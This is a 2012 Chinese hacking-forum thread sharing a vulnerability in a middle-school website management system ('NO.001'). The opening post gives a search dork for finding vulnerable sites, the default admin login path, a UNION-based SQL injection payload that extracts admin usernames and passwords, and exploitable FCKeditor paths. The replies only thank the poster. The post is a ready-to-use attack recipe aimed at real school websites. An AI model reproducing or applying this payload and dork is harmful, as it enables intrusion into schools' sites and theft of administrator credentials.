HUC-逍遥 发表于 2012-9-20 10:21:23

NO.001中学网站管理系统漏洞(转)

关键字:inurl:schoolmate.asp

默认后台:admin/login.asp

EXP:

联合查询 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin

另:FCK编辑器有几处可利用

admin/fckeditor/editor/

08小天 发表于 2012-9-20 14:49:17

名哲 发表于 2012-9-20 14:50:30

感谢LZ分享

禽兽 发表于 2012-9-22 18:23:07

无痕 发表于 2012-9-23 00:13:15

好好学习
页: [1]
查看完整版本: NO.001中学网站管理系统漏洞(转)